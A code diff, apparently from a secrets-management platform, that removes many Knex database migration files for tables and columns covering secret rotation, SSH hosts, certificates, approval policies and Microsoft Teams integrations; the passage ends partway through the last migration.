@@ -1,29 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas/models";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasColumn(TableName.SecretApprovalPolicy, "allowedSelfApprovals"))) {
await knex.schema.alterTable(TableName.SecretApprovalPolicy, (t) => {
t.boolean("allowedSelfApprovals").notNullable().defaultTo(true);
});
}
if (!(await knex.schema.hasColumn(TableName.AccessApprovalPolicy, "allowedSelfApprovals"))) {
await knex.schema.alterTable(TableName.AccessApprovalPolicy, (t) => {
t.boolean("allowedSelfApprovals").notNullable().defaultTo(true);
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasColumn(TableName.SecretApprovalPolicy, "allowedSelfApprovals")) {
await knex.schema.alterTable(TableName.SecretApprovalPolicy, (t) => {
t.dropColumn("allowedSelfApprovals");
});
}
if (await knex.schema.hasColumn(TableName.AccessApprovalPolicy, "allowedSelfApprovals")) {
await knex.schema.alterTable(TableName.AccessApprovalPolicy, (t) => {
t.dropColumn("allowedSelfApprovals");
});
}
}

View File

@@ -1,19 +0,0 @@
import { Knex } from "knex";
import { TableName } from "@app/db/schemas";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasColumn(TableName.AppConnection, "isPlatformManagedCredentials"))) {
await knex.schema.alterTable(TableName.AppConnection, (t) => {
t.boolean("isPlatformManagedCredentials").defaultTo(false);
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasColumn(TableName.AppConnection, "isPlatformManagedCredentials")) {
await knex.schema.alterTable(TableName.AppConnection, (t) => {
t.dropColumn("isPlatformManagedCredentials");
});
}
}

View File

@@ -1,58 +0,0 @@
import { Knex } from "knex";
import { TableName } from "@app/db/schemas";
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "@app/db/utils";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasTable(TableName.SecretRotationV2))) {
await knex.schema.createTable(TableName.SecretRotationV2, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.string("name", 32).notNullable();
t.string("description");
t.string("type").notNullable();
t.jsonb("parameters").notNullable();
t.jsonb("secretsMapping").notNullable();
t.binary("encryptedGeneratedCredentials").notNullable();
t.boolean("isAutoRotationEnabled").notNullable().defaultTo(true);
t.integer("activeIndex").notNullable().defaultTo(0);
t.uuid("folderId").notNullable();
t.foreign("folderId").references("id").inTable(TableName.SecretFolder).onDelete("CASCADE");
t.uuid("connectionId").notNullable();
t.foreign("connectionId").references("id").inTable(TableName.AppConnection);
t.timestamps(true, true, true);
t.integer("rotationInterval").notNullable();
t.jsonb("rotateAtUtc").notNullable(); // { hours: number; minutes: number }
t.string("rotationStatus").notNullable();
t.datetime("lastRotationAttemptedAt").notNullable();
t.datetime("lastRotatedAt").notNullable();
t.binary("encryptedLastRotationMessage"); // we encrypt this because it may contain sensitive info (SQL errors showing credentials)
t.string("lastRotationJobId");
t.datetime("nextRotationAt");
t.boolean("isLastRotationManual").notNullable().defaultTo(true); // creation is considered a "manual" rotation
});
await createOnUpdateTrigger(knex, TableName.SecretRotationV2);
await knex.schema.alterTable(TableName.SecretRotationV2, (t) => {
t.unique(["folderId", "name"]);
});
}
if (!(await knex.schema.hasTable(TableName.SecretRotationV2SecretMapping))) {
await knex.schema.createTable(TableName.SecretRotationV2SecretMapping, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.uuid("secretId").notNullable();
// scott: this is deferred to block secret deletion but not prevent folder/environment/project deletion
// ie, if rotation is being deleted as well we permit it, otherwise throw
t.foreign("secretId").references("id").inTable(TableName.SecretV2).deferrable("deferred");
t.uuid("rotationId").notNullable();
t.foreign("rotationId").references("id").inTable(TableName.SecretRotationV2).onDelete("CASCADE");
});
}
}
export async function down(knex: Knex): Promise<void> {
await knex.schema.dropTableIfExists(TableName.SecretRotationV2SecretMapping);
await knex.schema.dropTableIfExists(TableName.SecretRotationV2);
await dropOnUpdateTrigger(knex, TableName.SecretRotationV2);
}

View File

@@ -1,21 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasCol = await knex.schema.hasColumn(TableName.SecretFolder, "lastSecretModified");
if (!hasCol) {
await knex.schema.alterTable(TableName.SecretFolder, (t) => {
t.datetime("lastSecretModified");
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasCol = await knex.schema.hasColumn(TableName.SecretFolder, "lastSecretModified");
if (hasCol) {
await knex.schema.alterTable(TableName.SecretFolder, (t) => {
t.dropColumn("lastSecretModified");
});
}
}

View File

@@ -1,25 +0,0 @@
import { Knex } from "knex";
import { KmsKeyUsage } from "@app/services/kms/kms-types";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasKeyUsageColumn = await knex.schema.hasColumn(TableName.KmsKey, "keyUsage");
if (!hasKeyUsageColumn) {
await knex.schema.alterTable(TableName.KmsKey, (t) => {
t.string("keyUsage").notNullable().defaultTo(KmsKeyUsage.ENCRYPT_DECRYPT);
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasKeyUsageColumn = await knex.schema.hasColumn(TableName.KmsKey, "keyUsage");
if (hasKeyUsageColumn) {
await knex.schema.alterTable(TableName.KmsKey, (t) => {
t.dropColumn("keyUsage");
});
}
}

View File

@@ -1,32 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasColumn(TableName.SshCertificateAuthority, "keySource"))) {
await knex.schema.alterTable(TableName.SshCertificateAuthority, (t) => {
t.string("keySource");
});
// Backfilling the keySource to internal
await knex(TableName.SshCertificateAuthority).update({ keySource: "internal" });
await knex.schema.alterTable(TableName.SshCertificateAuthority, (t) => {
t.string("keySource").notNullable().alter();
});
}
if (await knex.schema.hasColumn(TableName.SshCertificate, "sshCaId")) {
await knex.schema.alterTable(TableName.SshCertificate, (t) => {
t.uuid("sshCaId").nullable().alter();
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasColumn(TableName.SshCertificateAuthority, "keySource")) {
await knex.schema.alterTable(TableName.SshCertificateAuthority, (t) => {
t.dropColumn("keySource");
});
}
}

View File

@@ -1,93 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasTable(TableName.SshHost))) {
await knex.schema.createTable(TableName.SshHost, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.timestamps(true, true, true);
t.string("projectId").notNullable();
t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
t.string("hostname").notNullable();
t.string("userCertTtl").notNullable();
t.string("hostCertTtl").notNullable();
t.uuid("userSshCaId").notNullable();
t.foreign("userSshCaId").references("id").inTable(TableName.SshCertificateAuthority).onDelete("CASCADE");
t.uuid("hostSshCaId").notNullable();
t.foreign("hostSshCaId").references("id").inTable(TableName.SshCertificateAuthority).onDelete("CASCADE");
t.unique(["projectId", "hostname"]);
});
await createOnUpdateTrigger(knex, TableName.SshHost);
}
if (!(await knex.schema.hasTable(TableName.SshHostLoginUser))) {
await knex.schema.createTable(TableName.SshHostLoginUser, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.timestamps(true, true, true);
t.uuid("sshHostId").notNullable();
t.foreign("sshHostId").references("id").inTable(TableName.SshHost).onDelete("CASCADE");
t.string("loginUser").notNullable(); // e.g. ubuntu, root, ec2-user, ...
t.unique(["sshHostId", "loginUser"]);
});
await createOnUpdateTrigger(knex, TableName.SshHostLoginUser);
}
if (!(await knex.schema.hasTable(TableName.SshHostLoginUserMapping))) {
await knex.schema.createTable(TableName.SshHostLoginUserMapping, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.timestamps(true, true, true);
t.uuid("sshHostLoginUserId").notNullable();
t.foreign("sshHostLoginUserId").references("id").inTable(TableName.SshHostLoginUser).onDelete("CASCADE");
t.uuid("userId").nullable();
t.foreign("userId").references("id").inTable(TableName.Users).onDelete("CASCADE");
t.unique(["sshHostLoginUserId", "userId"]);
});
await createOnUpdateTrigger(knex, TableName.SshHostLoginUserMapping);
}
if (!(await knex.schema.hasTable(TableName.ProjectSshConfig))) {
// new table to store configuration for projects of type SSH (i.e. Infisical SSH)
await knex.schema.createTable(TableName.ProjectSshConfig, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.timestamps(true, true, true);
t.string("projectId").notNullable();
t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
t.uuid("defaultUserSshCaId");
t.foreign("defaultUserSshCaId").references("id").inTable(TableName.SshCertificateAuthority).onDelete("CASCADE");
t.uuid("defaultHostSshCaId");
t.foreign("defaultHostSshCaId").references("id").inTable(TableName.SshCertificateAuthority).onDelete("CASCADE");
});
await createOnUpdateTrigger(knex, TableName.ProjectSshConfig);
}
const hasColumn = await knex.schema.hasColumn(TableName.SshCertificate, "sshHostId");
if (!hasColumn) {
await knex.schema.alterTable(TableName.SshCertificate, (t) => {
t.uuid("sshHostId").nullable();
t.foreign("sshHostId").references("id").inTable(TableName.SshHost).onDelete("SET NULL");
});
}
}
export async function down(knex: Knex): Promise<void> {
await knex.schema.dropTableIfExists(TableName.ProjectSshConfig);
await dropOnUpdateTrigger(knex, TableName.ProjectSshConfig);
await knex.schema.dropTableIfExists(TableName.SshHostLoginUserMapping);
await dropOnUpdateTrigger(knex, TableName.SshHostLoginUserMapping);
await knex.schema.dropTableIfExists(TableName.SshHostLoginUser);
await dropOnUpdateTrigger(knex, TableName.SshHostLoginUser);
const hasColumn = await knex.schema.hasColumn(TableName.SshCertificate, "sshHostId");
if (hasColumn) {
await knex.schema.alterTable(TableName.SshCertificate, (t) => {
t.dropColumn("sshHostId");
});
}
await knex.schema.dropTableIfExists(TableName.SshHost);
await dropOnUpdateTrigger(knex, TableName.SshHost);
}

View File

@@ -1,20 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasColumn(TableName.ResourceMetadata, "dynamicSecretId"))) {
await knex.schema.alterTable(TableName.ResourceMetadata, (tb) => {
tb.uuid("dynamicSecretId");
tb.foreign("dynamicSecretId").references("id").inTable(TableName.DynamicSecret).onDelete("CASCADE");
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasColumn(TableName.ResourceMetadata, "dynamicSecretId")) {
await knex.schema.alterTable(TableName.ResourceMetadata, (tb) => {
tb.dropColumn("dynamicSecretId");
});
}
}

View File

@@ -1,21 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasCol = await knex.schema.hasColumn(TableName.AccessApprovalRequest, "note");
if (!hasCol) {
await knex.schema.alterTable(TableName.AccessApprovalRequest, (t) => {
t.string("note").nullable();
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasCol = await knex.schema.hasColumn(TableName.AccessApprovalRequest, "note");
if (hasCol) {
await knex.schema.alterTable(TableName.AccessApprovalRequest, (t) => {
t.dropColumn("note");
});
}
}

View File

@@ -1,27 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasCol = await knex.schema.hasColumn(TableName.ServiceToken, "expiryNotificationSent");
if (!hasCol) {
await knex.schema.alterTable(TableName.ServiceToken, (t) => {
t.boolean("expiryNotificationSent").defaultTo(false);
});
// Update only tokens where expiresAt is before current time
await knex(TableName.ServiceToken)
.whereRaw(`${TableName.ServiceToken}."expiresAt" < NOW()`)
.whereNotNull("expiresAt")
.update({ expiryNotificationSent: true });
}
}
export async function down(knex: Knex): Promise<void> {
const hasCol = await knex.schema.hasColumn(TableName.ServiceToken, "expiryNotificationSent");
if (hasCol) {
await knex.schema.alterTable(TableName.ServiceToken, (t) => {
t.dropColumn("expiryNotificationSent");
});
}
}

View File

@@ -1,21 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasCol = await knex.schema.hasColumn(TableName.Project, "hasDeleteProtection");
if (!hasCol) {
await knex.schema.alterTable(TableName.Project, (t) => {
t.boolean("hasDeleteProtection").defaultTo(false);
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasCol = await knex.schema.hasColumn(TableName.Project, "hasDeleteProtection");
if (hasCol) {
await knex.schema.alterTable(TableName.Project, (t) => {
t.dropColumn("hasDeleteProtection");
});
}
}

View File

@@ -1,15 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
await knex.schema.alterTable(TableName.Certificate, (t) => {
t.string("altNames", 4096).alter();
});
}
export async function down(knex: Knex): Promise<void> {
await knex.schema.alterTable(TableName.Certificate, (t) => {
t.string("altNames").alter(); // Defaults to varchar(255)
});
}

View File

@@ -1,15 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
await knex.schema.alterTable(TableName.KmipOrgServerCertificates, (t) => {
t.string("altNames", 4096).alter();
});
}
export async function down(knex: Knex): Promise<void> {
await knex.schema.alterTable(TableName.KmipOrgServerCertificates, (t) => {
t.string("altNames").alter(); // Defaults to varchar(255)
});
}

View File

@@ -1,21 +0,0 @@
import { Knex } from "knex";
import { OIDCJWTSignatureAlgorithm } from "@app/ee/services/oidc/oidc-config-types";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasColumn(TableName.OidcConfig, "jwtSignatureAlgorithm"))) {
await knex.schema.alterTable(TableName.OidcConfig, (t) => {
t.string("jwtSignatureAlgorithm").defaultTo(OIDCJWTSignatureAlgorithm.RS256).notNullable();
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasColumn(TableName.OidcConfig, "jwtSignatureAlgorithm")) {
await knex.schema.alterTable(TableName.OidcConfig, (t) => {
t.dropColumn("jwtSignatureAlgorithm");
});
}
}

View File

@@ -1,19 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasColumn(TableName.Organization, "bypassOrgAuthEnabled"))) {
await knex.schema.alterTable(TableName.Organization, (t) => {
t.boolean("bypassOrgAuthEnabled").defaultTo(false).notNullable();
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasColumn(TableName.Organization, "bypassOrgAuthEnabled")) {
await knex.schema.alterTable(TableName.Organization, (t) => {
t.dropColumn("bypassOrgAuthEnabled");
});
}
}

View File

@@ -1,34 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasSecretReminderRecipientsTable = await knex.schema.hasTable(TableName.SecretReminderRecipients);
if (!hasSecretReminderRecipientsTable) {
await knex.schema.createTable(TableName.SecretReminderRecipients, (table) => {
table.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
table.timestamps(true, true, true);
table.uuid("secretId").notNullable();
table.uuid("userId").notNullable();
table.string("projectId").notNullable();
// Based on userId rather than project membership ID so we can easily extend group support in the future if need be.
// This does however mean we need to manually clean up once a user is removed from a project.
table.foreign("userId").references("id").inTable(TableName.Users).onDelete("CASCADE");
table.foreign("secretId").references("id").inTable(TableName.SecretV2).onDelete("CASCADE");
table.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
table.index("secretId");
table.unique(["secretId", "userId"]);
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasSecretReminderRecipientsTable = await knex.schema.hasTable(TableName.SecretReminderRecipients);
if (hasSecretReminderRecipientsTable) {
await knex.schema.dropTableIfExists(TableName.SecretReminderRecipients);
}
}

View File

@@ -1,29 +0,0 @@
import { Knex } from "knex";
import { TableName } from "@app/db/schemas";
export async function up(knex: Knex): Promise<void> {
await knex.schema.alterTable(TableName.SecretVersionV2, (table) => {
table.dropForeign(["userActorId"]);
table.dropForeign(["identityActorId"]);
});
await knex.schema.alterTable(TableName.SecretVersionV2, (table) => {
table.foreign("userActorId").references("id").inTable(TableName.Users).onDelete("SET NULL");
table.foreign("identityActorId").references("id").inTable(TableName.Identity).onDelete("SET NULL");
});
}
export async function down(knex: Knex): Promise<void> {
await knex.schema.alterTable(TableName.SecretVersionV2, (table) => {
table.dropForeign(["userActorId"]);
table.dropForeign(["identityActorId"]);
});
await knex.schema.alterTable(TableName.SecretVersionV2, (table) => {
table.foreign("userActorId").references("id").inTable(TableName.Users);
table.foreign("identityActorId").references("id").inTable(TableName.Identity);
});
}

View File

@@ -1,130 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";
export async function up(knex: Knex): Promise<void> {
const superAdminHasEncryptedMicrosoftTeamsClientIdColumn = await knex.schema.hasColumn(
TableName.SuperAdmin,
"encryptedMicrosoftTeamsAppId"
);
const superAdminHasEncryptedMicrosoftTeamsClientSecret = await knex.schema.hasColumn(
TableName.SuperAdmin,
"encryptedMicrosoftTeamsClientSecret"
);
const superAdminHasEncryptedMicrosoftTeamsBotId = await knex.schema.hasColumn(
TableName.SuperAdmin,
"encryptedMicrosoftTeamsBotId"
);
if (
!superAdminHasEncryptedMicrosoftTeamsClientIdColumn ||
!superAdminHasEncryptedMicrosoftTeamsClientSecret ||
!superAdminHasEncryptedMicrosoftTeamsBotId
) {
await knex.schema.alterTable(TableName.SuperAdmin, (table) => {
if (!superAdminHasEncryptedMicrosoftTeamsClientIdColumn) {
table.binary("encryptedMicrosoftTeamsAppId").nullable();
}
if (!superAdminHasEncryptedMicrosoftTeamsClientSecret) {
table.binary("encryptedMicrosoftTeamsClientSecret").nullable();
}
if (!superAdminHasEncryptedMicrosoftTeamsBotId) {
table.binary("encryptedMicrosoftTeamsBotId").nullable();
}
});
}
if (!(await knex.schema.hasColumn(TableName.WorkflowIntegrations, "status"))) {
await knex.schema.alterTable(TableName.WorkflowIntegrations, (table) => {
table.enu("status", ["pending", "installed", "failed"]).notNullable().defaultTo("installed"); // defaults to installed so we can have backwards compatibility with existing workflow integrations
});
}
if (!(await knex.schema.hasTable(TableName.MicrosoftTeamsIntegrations))) {
await knex.schema.createTable(TableName.MicrosoftTeamsIntegrations, (table) => {
table.uuid("id", { primaryKey: true }).notNullable();
table.foreign("id").references("id").inTable(TableName.WorkflowIntegrations).onDelete("CASCADE"); // the ID itself is the workflow integration ID
table.string("internalTeamsAppId").nullable();
table.string("tenantId").notNullable();
table.binary("encryptedAccessToken").nullable();
table.binary("encryptedBotAccessToken").nullable();
table.timestamp("accessTokenExpiresAt").nullable();
table.timestamp("botAccessTokenExpiresAt").nullable();
table.timestamps(true, true, true);
});
await createOnUpdateTrigger(knex, TableName.MicrosoftTeamsIntegrations);
}
if (!(await knex.schema.hasTable(TableName.ProjectMicrosoftTeamsConfigs))) {
await knex.schema.createTable(TableName.ProjectMicrosoftTeamsConfigs, (tb) => {
tb.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
tb.string("projectId").notNullable().unique();
tb.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
tb.uuid("microsoftTeamsIntegrationId").notNullable();
tb.foreign("microsoftTeamsIntegrationId")
.references("id")
.inTable(TableName.MicrosoftTeamsIntegrations)
.onDelete("CASCADE");
tb.boolean("isAccessRequestNotificationEnabled").notNullable().defaultTo(false);
tb.boolean("isSecretRequestNotificationEnabled").notNullable().defaultTo(false);
tb.jsonb("accessRequestChannels").notNullable(); // {teamId: string, channelIds: string[]}
tb.jsonb("secretRequestChannels").notNullable(); // {teamId: string, channelIds: string[]}
tb.timestamps(true, true, true);
});
await createOnUpdateTrigger(knex, TableName.ProjectMicrosoftTeamsConfigs);
}
}
export async function down(knex: Knex): Promise<void> {
const hasEncryptedMicrosoftTeamsClientIdColumn = await knex.schema.hasColumn(
TableName.SuperAdmin,
"encryptedMicrosoftTeamsAppId"
);
const hasEncryptedMicrosoftTeamsClientSecret = await knex.schema.hasColumn(
TableName.SuperAdmin,
"encryptedMicrosoftTeamsClientSecret"
);
const hasEncryptedMicrosoftTeamsBotId = await knex.schema.hasColumn(
TableName.SuperAdmin,
"encryptedMicrosoftTeamsBotId"
);
if (
hasEncryptedMicrosoftTeamsClientIdColumn ||
hasEncryptedMicrosoftTeamsClientSecret ||
hasEncryptedMicrosoftTeamsBotId
) {
await knex.schema.alterTable(TableName.SuperAdmin, (table) => {
if (hasEncryptedMicrosoftTeamsClientIdColumn) {
table.dropColumn("encryptedMicrosoftTeamsAppId");
}
if (hasEncryptedMicrosoftTeamsClientSecret) {
table.dropColumn("encryptedMicrosoftTeamsClientSecret");
}
if (hasEncryptedMicrosoftTeamsBotId) {
table.dropColumn("encryptedMicrosoftTeamsBotId");
}
});
}
if (await knex.schema.hasColumn(TableName.WorkflowIntegrations, "status")) {
await knex.schema.alterTable(TableName.WorkflowIntegrations, (table) => {
table.dropColumn("status");
});
}
if (await knex.schema.hasTable(TableName.ProjectMicrosoftTeamsConfigs)) {
await knex.schema.dropTableIfExists(TableName.ProjectMicrosoftTeamsConfigs);
await dropOnUpdateTrigger(knex, TableName.ProjectMicrosoftTeamsConfigs);
}
if (await knex.schema.hasTable(TableName.MicrosoftTeamsIntegrations)) {
await knex.schema.dropTableIfExists(TableName.MicrosoftTeamsIntegrations);
await dropOnUpdateTrigger(knex, TableName.MicrosoftTeamsIntegrations);
}
}

View File

@@ -1,47 +0,0 @@
import { Knex } from "knex";
import { ProjectType, TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasDefaultUserCaCol = await knex.schema.hasColumn(TableName.ProjectSshConfig, "defaultUserSshCaId");
const hasDefaultHostCaCol = await knex.schema.hasColumn(TableName.ProjectSshConfig, "defaultHostSshCaId");
if (hasDefaultUserCaCol && hasDefaultHostCaCol) {
await knex.schema.alterTable(TableName.ProjectSshConfig, (t) => {
t.dropForeign(["defaultUserSshCaId"]);
t.dropForeign(["defaultHostSshCaId"]);
});
await knex.schema.alterTable(TableName.ProjectSshConfig, (t) => {
// allow nullable (does not wipe existing values)
t.uuid("defaultUserSshCaId").nullable().alter();
t.uuid("defaultHostSshCaId").nullable().alter();
// re-add with SET NULL behavior (previously CASCADE)
t.foreign("defaultUserSshCaId").references("id").inTable(TableName.SshCertificateAuthority).onDelete("SET NULL");
t.foreign("defaultHostSshCaId").references("id").inTable(TableName.SshCertificateAuthority).onDelete("SET NULL");
});
}
// (dangtony98): backfill by adding null defaults CAs for all existing Infisical SSH projects
// that do not have an associated ProjectSshConfig record introduced in Infisical SSH V2.
const allProjects = await knex(TableName.Project).where("type", ProjectType.SSH).select("id");
const projectsWithConfig = await knex(TableName.ProjectSshConfig).select("projectId");
const projectIdsWithConfig = new Set(projectsWithConfig.map((config) => config.projectId));
const projectsNeedingConfig = allProjects.filter((project) => !projectIdsWithConfig.has(project.id));
if (projectsNeedingConfig.length > 0) {
const configsToInsert = projectsNeedingConfig.map((project) => ({
projectId: project.id,
defaultUserSshCaId: null,
defaultHostSshCaId: null,
createdAt: new Date(),
updatedAt: new Date()
}));
await knex.batchInsert(TableName.ProjectSshConfig, configsToInsert);
}
}
export async function down(): Promise<void> {}

View File

@@ -1,23 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasAliasColumn = await knex.schema.hasColumn(TableName.SshHost, "alias");
if (!hasAliasColumn) {
await knex.schema.alterTable(TableName.SshHost, (t) => {
t.string("alias").nullable();
t.unique(["projectId", "alias"]);
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasAliasColumn = await knex.schema.hasColumn(TableName.SshHost, "alias");
if (hasAliasColumn) {
await knex.schema.alterTable(TableName.SshHost, (t) => {
t.dropUnique(["projectId", "alias"]);
t.dropColumn("alias");
});
}
}

View File

@@ -1,26 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";
export async function up(knex: Knex): Promise<void> {
const hasTable = await knex.schema.hasTable(TableName.GithubOrgSyncConfig);
if (!hasTable) {
await knex.schema.createTable(TableName.GithubOrgSyncConfig, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.string("githubOrgName").notNullable();
t.boolean("isActive").defaultTo(false);
t.binary("encryptedGithubOrgAccessToken");
t.uuid("orgId").notNullable().unique();
t.foreign("orgId").references("id").inTable(TableName.Organization).onDelete("CASCADE");
t.timestamps(true, true, true);
});
}
await createOnUpdateTrigger(knex, TableName.GithubOrgSyncConfig);
}
export async function down(knex: Knex): Promise<void> {
await knex.schema.dropTableIfExists(TableName.GithubOrgSyncConfig);
await dropOnUpdateTrigger(knex, TableName.GithubOrgSyncConfig);
}

View File

@@ -1,27 +0,0 @@
import { Knex } from "knex";
import { getConfig } from "@app/lib/config/env";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const appCfg = getConfig();
const tokenDuration = appCfg?.JWT_REFRESH_LIFETIME;
if (!(await knex.schema.hasColumn(TableName.Organization, "userTokenExpiration"))) {
await knex.schema.alterTable(TableName.Organization, (t) => {
t.string("userTokenExpiration");
});
if (tokenDuration) {
await knex(TableName.Organization).update({ userTokenExpiration: tokenDuration });
}
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasColumn(TableName.Organization, "userTokenExpiration")) {
await knex.schema.alterTable(TableName.Organization, (t) => {
t.dropColumn("userTokenExpiration");
});
}
}

View File

@@ -1,55 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasTable(TableName.SshHostGroup))) {
await knex.schema.createTable(TableName.SshHostGroup, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.timestamps(true, true, true);
t.string("projectId").notNullable();
t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
t.string("name").notNullable();
t.unique(["projectId", "name"]);
});
await createOnUpdateTrigger(knex, TableName.SshHostGroup);
}
if (!(await knex.schema.hasTable(TableName.SshHostGroupMembership))) {
await knex.schema.createTable(TableName.SshHostGroupMembership, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.timestamps(true, true, true);
t.uuid("sshHostGroupId").notNullable();
t.foreign("sshHostGroupId").references("id").inTable(TableName.SshHostGroup).onDelete("CASCADE");
t.uuid("sshHostId").notNullable();
t.foreign("sshHostId").references("id").inTable(TableName.SshHost).onDelete("CASCADE");
t.unique(["sshHostGroupId", "sshHostId"]);
});
await createOnUpdateTrigger(knex, TableName.SshHostGroupMembership);
}
const hasGroupColumn = await knex.schema.hasColumn(TableName.SshHostLoginUser, "sshHostGroupId");
if (!hasGroupColumn) {
await knex.schema.alterTable(TableName.SshHostLoginUser, (t) => {
t.uuid("sshHostGroupId").nullable();
t.foreign("sshHostGroupId").references("id").inTable(TableName.SshHostGroup).onDelete("CASCADE");
t.uuid("sshHostId").nullable().alter();
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasGroupColumn = await knex.schema.hasColumn(TableName.SshHostLoginUser, "sshHostGroupId");
if (hasGroupColumn) {
await knex.schema.alterTable(TableName.SshHostLoginUser, (t) => {
t.dropColumn("sshHostGroupId");
});
}
await knex.schema.dropTableIfExists(TableName.SshHostGroupMembership);
await dropOnUpdateTrigger(knex, TableName.SshHostGroupMembership);
await knex.schema.dropTableIfExists(TableName.SshHostGroup);
await dropOnUpdateTrigger(knex, TableName.SshHostGroup);
}

View File

@@ -1,44 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
if (await knex.schema.hasTable(TableName.Certificate)) {
const hasProjectIdColumn = await knex.schema.hasColumn(TableName.Certificate, "projectId");
if (!hasProjectIdColumn) {
await knex.schema.alterTable(TableName.Certificate, (t) => {
t.string("projectId", 36).nullable();
t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
});
await knex.raw(`
UPDATE "${TableName.Certificate}" cert
SET "projectId" = ca."projectId"
FROM "${TableName.CertificateAuthority}" ca
WHERE cert."caId" = ca.id
`);
await knex.schema.alterTable(TableName.Certificate, (t) => {
t.string("projectId").notNullable().alter();
});
}
await knex.schema.alterTable(TableName.Certificate, (t) => {
t.uuid("caId").nullable().alter();
t.uuid("caCertId").nullable().alter();
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasTable(TableName.Certificate)) {
if (await knex.schema.hasColumn(TableName.Certificate, "projectId")) {
await knex.schema.alterTable(TableName.Certificate, (t) => {
t.dropForeign("projectId");
t.dropColumn("projectId");
});
}
}
// Altering back to notNullable for caId and caCertId will fail
}

View File

@@ -1,33 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasColumn(TableName.CertificateBody, "encryptedCertificateChain"))) {
await knex.schema.alterTable(TableName.CertificateBody, (t) => {
t.binary("encryptedCertificateChain").nullable();
});
}
if (!(await knex.schema.hasTable(TableName.CertificateSecret))) {
await knex.schema.createTable(TableName.CertificateSecret, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.timestamps(true, true, true);
t.uuid("certId").notNullable().unique();
t.foreign("certId").references("id").inTable(TableName.Certificate).onDelete("CASCADE");
t.binary("encryptedPrivateKey").notNullable();
});
}
}
export async function down(knex: Knex): Promise<void> {
